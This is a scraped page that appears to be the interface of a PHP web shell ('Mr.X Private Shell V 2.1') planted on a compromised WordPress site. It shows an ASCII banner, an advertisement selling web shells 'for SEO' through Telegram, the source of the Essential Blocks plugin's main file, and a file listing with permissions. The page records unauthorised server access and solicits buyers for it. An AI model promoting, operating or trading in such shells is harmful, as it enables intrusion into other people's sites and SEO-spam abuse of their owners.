__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Plugin Name: Essential Blocks
* Plugin URI: https://essential-blocks.com
* Description: The Ultimate Gutenberg blocks library to create WordPress sites in the Gutenberg Block Editor with 60+ essential blocks, patterns, templates for WooCommerce, posts, & more.
* Author: WPDeveloper
* Author URI: https://wpdeveloper.com
* Version: 5.8.0
* License: GPL3+
* License URI: http://www.gnu.org/licenses/gpl-3.0.txt
* Text Domain: essential-blocks
*
* @package Essential_Blocks
*/
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
// Define things
define( 'ESSENTIAL_BLOCKS_FILE', __FILE__ );
require_once __DIR__ . '/autoload.php';
function wpdev_essential_blocks()
{
return EssentialBlocks\Plugin::get_instance();
}
wpdev_essential_blocks();| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0750 |
|
|
| includes | Folder | 0750 |
|
|
| languages | Folder | 0750 |
|
|
| patterns | Folder | 0750 |
|
|
| src | Folder | 0750 |
|
|
| templates | Folder | 0750 |
|
|
| views | Folder | 0750 |
|
|
| autoload.php | File | 1.06 KB | 0640 |
|
| essential-blocks.php | File | 764 B | 0640 |
|
| readme.txt | File | 28.15 KB | 0640 |
|
| wpml-config.xml | File | 3.73 KB | 0640 |
|